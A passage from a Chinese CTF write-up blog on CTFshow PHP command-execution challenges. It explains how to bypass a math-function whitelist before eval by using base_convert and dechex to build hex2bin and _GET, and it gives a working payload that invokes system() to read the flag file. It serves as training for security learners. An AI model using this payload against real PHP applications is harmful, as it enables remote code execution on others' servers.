class="string">&#x27;ceil&#x27;</span>, <span class="string">&#x27;cos&#x27;</span>, <span class="string">&#x27;cosh&#x27;</span>, <span class="string">&#x27;decbin&#x27;</span>, <span class="string">&#x27;dechex&#x27;</span>, <span class="string">&#x27;decoct&#x27;</span>, <span class="string">&#x27;deg2rad&#x27;</span>, <span class="string">&#x27;exp&#x27;</span>, <span class="string">&#x27;expm1&#x27;</span>, <span class="string">&#x27;floor&#x27;</span>, <span class="string">&#x27;fmod&#x27;</span>, <span class="string">&#x27;getrandmax&#x27;</span>, <span class="string">&#x27;hexdec&#x27;</span>, <span class="string">&#x27;hypot&#x27;</span>, <span class="string">&#x27;is_finite&#x27;</span>, <span class="string">&#x27;is_infinite&#x27;</span>, <span class="string">&#x27;is_nan&#x27;</span>, <span class="string">&#x27;lcg_value&#x27;</span>, <span class="string">&#x27;log10&#x27;</span>, <span class="string">&#x27;log1p&#x27;</span>, <span class="string">&#x27;log&#x27;</span>, <span class="string">&#x27;max&#x27;</span>, <span class="string">&#x27;min&#x27;</span>, <span class="string">&#x27;mt_getrandmax&#x27;</span>, <span class="string">&#x27;mt_rand&#x27;</span>, <span class="string">&#x27;mt_srand&#x27;</span>, <span class="string">&#x27;octdec&#x27;</span>, <span class="string">&#x27;pi&#x27;</span>, <span class="string">&#x27;pow&#x27;</span>, <span class="string">&#x27;rad2deg&#x27;</span>, <span class="string">&#x27;rand&#x27;</span>, <span class="string">&#x27;round&#x27;</span>, <span class="string">&#x27;sin&#x27;</span>, <span class="string">&#x27;sinh&#x27;</span>, <span class="string">&#x27;sqrt&#x27;</span>, <span class="string">&#x27;srand&#x27;</span>, <span class="string">&#x27;tan&#x27;</span>, <span class="string">&#x27;tanh&#x27;</span>];</span><br><span class="line">    preg_match_all(<span class="string">&#x27;/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/&#x27;</span>, <span class="variable">$content</span>, <span class="variable">$used_funcs</span>);  </span><br><span class="line">    <span class="keyword">foreach</span> (<span class="variable">$used_funcs</span>[<span class="number">0</span>] <span class="keyword">as</span> <span class="variable">$func</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> (!in_array(<span class="variable">$func</span>, <span class="variable">$whitelist</span>)) &#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;请不要输入奇奇怪怪的函数&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//帮你算出答案</span></span><br><span class="line">    <span class="keyword">eval</span>(<span class="string">&#x27;echo &#x27;</span>.<span class="variable">$content</span>.<span class="string">&#x27;;&#x27;</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<h2 id="一-解题思路：-1"><a href="#一-解题思路：-1" class="headerlink" title="一.解题思路："></a>一.解题思路：</h2><p>这道题给我们留了很多的数学函数，我们发现其中基本全是php中可用使用的函数。而且很多是可用进行进制转换的。我们来看下具体的函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">base_convert(number,frombase,tobase);</span><br><span class="line">参数	描述</span><br><span class="line">number	    必需。规定要转换的数。</span><br><span class="line">frombase	必需。规定数字原来的进制。介于 2 和 36 之间（包括 2 和 36）。高于十进制的数字用字母 a-z 表示，例如 a 表示 10，b 表示 11 以及 z 表示 35。</span><br><span class="line">tobase	    必需。规定要转换的进制。介于 2 和 36 之间（包括 2 和 36）。高于十进制的数字用字母 a-z 表示，例如 a 表示 10，b 表示 11 以及 z 表示 35。</span><br><span class="line"></span><br><span class="line">bindec — 二进制转换为十进制</span><br><span class="line">bindec ( string $binary_string ) : number</span><br><span class="line"></span><br><span class="line">decbin — 十进制转换为二进制</span><br><span class="line">decbin ( int $number ) : string</span><br><span class="line"></span><br><span class="line">dechex — 十进制转换为十六进制</span><br><span class="line">dechex ( int $number ) : string</span><br><span class="line"></span><br><span class="line">decoct — 十进制转换为八进制</span><br><span class="line">decoct ( int $number ) : string</span><br><span class="line"></span><br><span class="line">hexdec — 十六进制转换为十进制</span><br><span class="line">hexdec ( int $number ) : string</span><br></pre></td></tr></table></figure>

<p>在这个题中，我们不能使用除题目白名单中给出的函数以外的任何字符。那我们的目的就是构造出字母或者构造出函数。<br>假设我们要构造出如下表达式<br><code>c=$_GET[a]($_GET[b])&amp;a=system&amp;b=cat flag</code><br>我们需要构造的是其实只有 _GET，$我们可用使用，中括号可用花括号代替，小括号也是可以使用的。这时候我们想到了一个办法，如果可以构造出hex2bin函数就可以将16进制转换成字符串了。我们又可以用decoct将10进制转换成16进制。也就是可以将10进制转换成字符串。<br>那么问题来了，hex2bin怎么构造呢，这时候就需要用到base_convert了。<br>我们发现36进制中包含了所有的数字和字母，所有只需要将hex2bin按照36进制转换成10进制就可以了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">echo base_convert(&#x27;hex2bin&#x27;, 36, 10);</span><br><span class="line">结果  37907361743</span><br><span class="line"></span><br><span class="line">echo hexdec(bin2hex(&quot;_GET&quot;));</span><br><span class="line">结果 1598506324</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>现在我们要做的就是反过来了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">base_convert(&#x27;37907361743&#x27;,10,36);    hex2bin</span><br><span class="line"></span><br><span class="line">base_convert(&#x27;37907361743&#x27;,10,36)(dechex(&#x27;1598506324&#x27;));    _GET</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c=$pi=_GET;$$pi&#123;abs&#125;($$pi&#123;acos&#125;)&amp;abs=system&amp;acos=tac f*</span><br></pre></td></tr></table></figure>

<p>我们再把_GET进行替换</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload:c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi&#123;abs&#125;($$pi&#123;acos&#125;)&amp;abs=system&amp;acos=tac f*</span><br></pre></td></tr></table></figure>

</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">惜缘怀古</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://xiyuanhuaigu.gitee.io/2022/07/08/CTFshow-web-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/">https://xiyuanhuaigu.gitee.io/2022/07/08/CTFshow-web-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://xiyuanhuaigu.gitee.io" target="_blank">惜缘怀古的博客</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"></div><div class="post_share"><div class="social-share" data-image="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/minglingzhixing.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2022/07/24/WSL2-docker-%E9%85%8D%E7%BD%AE/"><img class="prev-cover" src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/fbe7e77005da6faf3a5839b2a8f940369491b04e_raw.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">WSL2 docker 配置</div></div></a></div><div class="next-post pull-right"><a href="/2022/07/06/ctfshow-web%E5%85%A5%E9%97%A8-%E7%88%86%E7%A0%B4/"><img class="next-cover" src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/241a389f507b0b2a6168d74f43c142d3419c8c6c_raw.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">ctfshow web入门 爆破</div></div></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/2.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">惜缘怀古</div><div class="author-info__description">唯有那份炫目，未曾忘却</div></div><div class="card-info-data is-center"><div class="card-info-data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">66</div></a></div><div class="card-info-data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">0</div></a></div><div class="card-info-data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">0</div></a></div></div><a class="button--animated" id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn card-announcement-animation"></i><span>公告</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#web-29"><span class="toc-number">1.</span> <span class="toc-text">web 29</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A"><span class="toc-number">1.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E8%BF%87%E7%A8%8B%EF%BC%9A"><span class="toc-number">1.2.</span> <span class="toc-text">二.解题过程：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%9A"><span class="toc-number">1.2.1.</span> <span class="toc-text">方法一：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%9A"><span class="toc-number">1.2.2.</span> <span class="toc-text">方法二：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%89%EF%BC%9A"><span class="toc-number">1.2.3.</span> <span class="toc-text">方法三：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-30"><span class="toc-number">2.</span> <span class="toc-text">web 30</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-1"><span class="toc-number">2.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E8%BF%87%E7%A8%8B%EF%BC%9A-1"><span class="toc-number">2.2.</span> <span class="toc-text">二.解题过程：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%9A-1"><span class="toc-number">2.2.1.</span> <span class="toc-text">方法一：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%9A-1"><span class="toc-number">2.2.2.</span> <span class="toc-text">方法二：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%89%EF%BC%9A-1"><span class="toc-number">2.2.3.</span> <span class="toc-text">方法三：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-31"><span class="toc-number">3.</span> <span class="toc-text">web 31</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-2"><span class="toc-number">3.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="toc-number">3.2.</span> <span class="toc-text">二.解题思路：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%9A-2"><span class="toc-number">3.2.1.</span> <span class="toc-text">方法一：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C"><span class="toc-number">3.2.2.</span> <span class="toc-text">方法二:</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-32"><span class="toc-number">4.</span> <span class="toc-text">web 32</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81"><span class="toc-number">4.1.</span> <span class="toc-text">一.分析代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-1"><span class="toc-number">4.2.</span> <span class="toc-text">二.解题思路：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-33"><span class="toc-number">5.</span> <span class="toc-text">web 33</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-3"><span class="toc-number">5.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-2"><span class="toc-number">5.2.</span> <span class="toc-text">二.解题思路：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%9A-3"><span class="toc-number">5.2.1.</span> <span class="toc-text">方法一：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%9A-2"><span class="toc-number">5.2.2.</span> <span class="toc-text">方法二：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-34"><span class="toc-number">6.</span> <span class="toc-text">web 34</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-4"><span class="toc-number">6.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-3"><span class="toc-number">6.2.</span> <span class="toc-text">二.解题思路：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%9A-4"><span class="toc-number">6.2.1.</span> <span class="toc-text">方法一：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%9A-3"><span class="toc-number">6.2.2.</span> <span class="toc-text">方法二：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-35"><span class="toc-number">7.</span> <span class="toc-text">web 35</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-5"><span class="toc-number">7.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="toc-number">7.2.</span> <span class="toc-text">二.解题思路</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%9A-5"><span class="toc-number">7.2.1.</span> <span class="toc-text">方法一：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%9A-4"><span class="toc-number">7.2.2.</span> <span class="toc-text">方法二：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-36"><span class="toc-number">8.</span> <span class="toc-text">web 36</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-6"><span class="toc-number">8.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-4"><span class="toc-number">8.2.</span> <span class="toc-text">二.解题思路：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%9A-6"><span class="toc-number">8.2.1.</span> <span class="toc-text">方法一：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%9A-5"><span class="toc-number">8.2.2.</span> <span class="toc-text">方法二：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-37"><span class="toc-number">9.</span> <span class="toc-text">web 37</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81-1"><span class="toc-number">9.1.</span> <span class="toc-text">一.分析代码:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-5"><span class="toc-number">9.2.</span> <span class="toc-text">二.解题思路：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%9A-7"><span class="toc-number">9.2.1.</span> <span class="toc-text">方法一：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%9A-6"><span class="toc-number">9.2.2.</span> <span class="toc-text">方法二：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%89%EF%BC%9A-2"><span class="toc-number">9.2.3.</span> <span class="toc-text">方法三：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-38"><span class="toc-number">10.</span> <span class="toc-text">web 38</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-7"><span class="toc-number">10.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-6"><span class="toc-number">10.2.</span> <span class="toc-text">二.解题思路：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80"><span class="toc-number">10.2.1.</span> <span class="toc-text">方法一:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%9A-7"><span class="toc-number">10.2.2.</span> <span class="toc-text">方法二：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-39"><span class="toc-number">11.</span> <span class="toc-text">web 39</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-8"><span class="toc-number">11.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-7"><span class="toc-number">11.2.</span> <span class="toc-text">二.解题思路：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-40"><span class="toc-number">12.</span> <span class="toc-text">web 40</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-9"><span class="toc-number">12.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-8"><span class="toc-number">12.2.</span> <span class="toc-text">二.解题思路：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-41"><span class="toc-number">13.</span> <span class="toc-text">web 41</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-10"><span class="toc-number">13.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-9"><span class="toc-number">13.2.</span> <span class="toc-text">二.解题思路：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-42"><span class="toc-number">14.</span> <span class="toc-text">web 42</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-11"><span class="toc-number">14.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-10"><span class="toc-number">14.2.</span> <span class="toc-text">二.解题思路：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-43"><span class="toc-number">15.</span> <span class="toc-text">web 43</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-12"><span class="toc-number">15.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-11"><span class="toc-number">15.2.</span> <span class="toc-text">二.解题思路：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-44"><span class="toc-number">16.</span> <span class="toc-text">web 44</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-13"><span class="toc-number">16.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-12"><span class="toc-number">16.2.</span> <span class="toc-text">二.解题思路：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-45"><span class="toc-number">17.</span> <span class="toc-text">web 45</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-14"><span class="toc-number">17.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-13"><span class="toc-number">17.2.</span> <span class="toc-text">二.解题思路：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-46"><span class="toc-number">18.</span> <span class="toc-text">web 46</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-15"><span class="toc-number">18.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-14"><span class="toc-number">18.2.</span> <span class="toc-text">二.解题思路：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-47"><span class="toc-number">19.</span> <span class="toc-text">web 47</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-16"><span class="toc-number">19.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-15"><span class="toc-number">19.2.</span> <span class="toc-text">二.解题思路：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-48"><span class="toc-number">20.</span> <span class="toc-text">web 48</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-17"><span class="toc-number">20.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-16"><span class="toc-number">20.2.</span> <span class="toc-text">二.解题思路：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-49"><span class="toc-number">21.</span> <span class="toc-text">web 49</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-18"><span class="toc-number">21.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-17"><span class="toc-number">21.2.</span> <span class="toc-text">二.解题思路：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-50"><span class="toc-number">22.</span> <span class="toc-text">web 50</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-19"><span class="toc-number">22.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-18"><span class="toc-number">22.2.</span> <span class="toc-text">二.解题思路：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-51"><span class="toc-number">23.</span> <span class="toc-text">web 51</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-20"><span class="toc-number">23.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-19"><span class="toc-number">23.2.</span> <span class="toc-text">二.解题思路：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-52"><span class="toc-number">24.</span> <span class="toc-text">web 52</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E5%88%86%E6%9E%90%E4%BB%A3%E7%A0%81%EF%BC%9A-21"><span class="toc-number">24.1.</span> <span class="toc-text">一.分析代码：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-20"><span class="toc-number">24.2.</span> <span class="toc-text">二.解题思路：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-53"><span class="toc-number">25.</span> <span class="toc-text">web 53</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" 